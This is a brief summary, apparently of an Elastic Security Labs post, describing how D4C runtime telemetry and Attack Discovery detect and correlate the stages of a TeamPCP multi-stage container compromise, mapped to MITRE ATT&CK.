PUBLISHED on 20 March 2026, this Elastic Security Labs piece provides a real‑world walkthrough of TeamPCP’s multi‑stage container compromise, demonstrated through D4C runtime telemetry across execution, persistence, lateral movement, and monetization phases. The scenario, based on Flare’s documentation, follows how TeamPCP operates inside a containerised environment and maps behaviours to MITRE ATT&CK, illustrating how detection logic recognises each stage as part of a coherent attack chain.
It covers Stage 1’s download-and-pipe‑to‑shell, Kubernetes environment discovery, and Stage 3’s lateral movement via kube[.]py, continuing through persistence via Systemd, runtime tool installation, tunnelling and proxy access, encoded payload execution, miner deployment, and finally node‑level escalation and control.
The article emphasises D4C’s ability to surface runtime signals inside containers while noting that certain steps, such as privileged workload creation or control‑plane manipulation, require Kubernetes audit logs for full visibility. Attack Discovery is highlighted as correlating 130+ signals into a single, narrative summary of the full kill chain.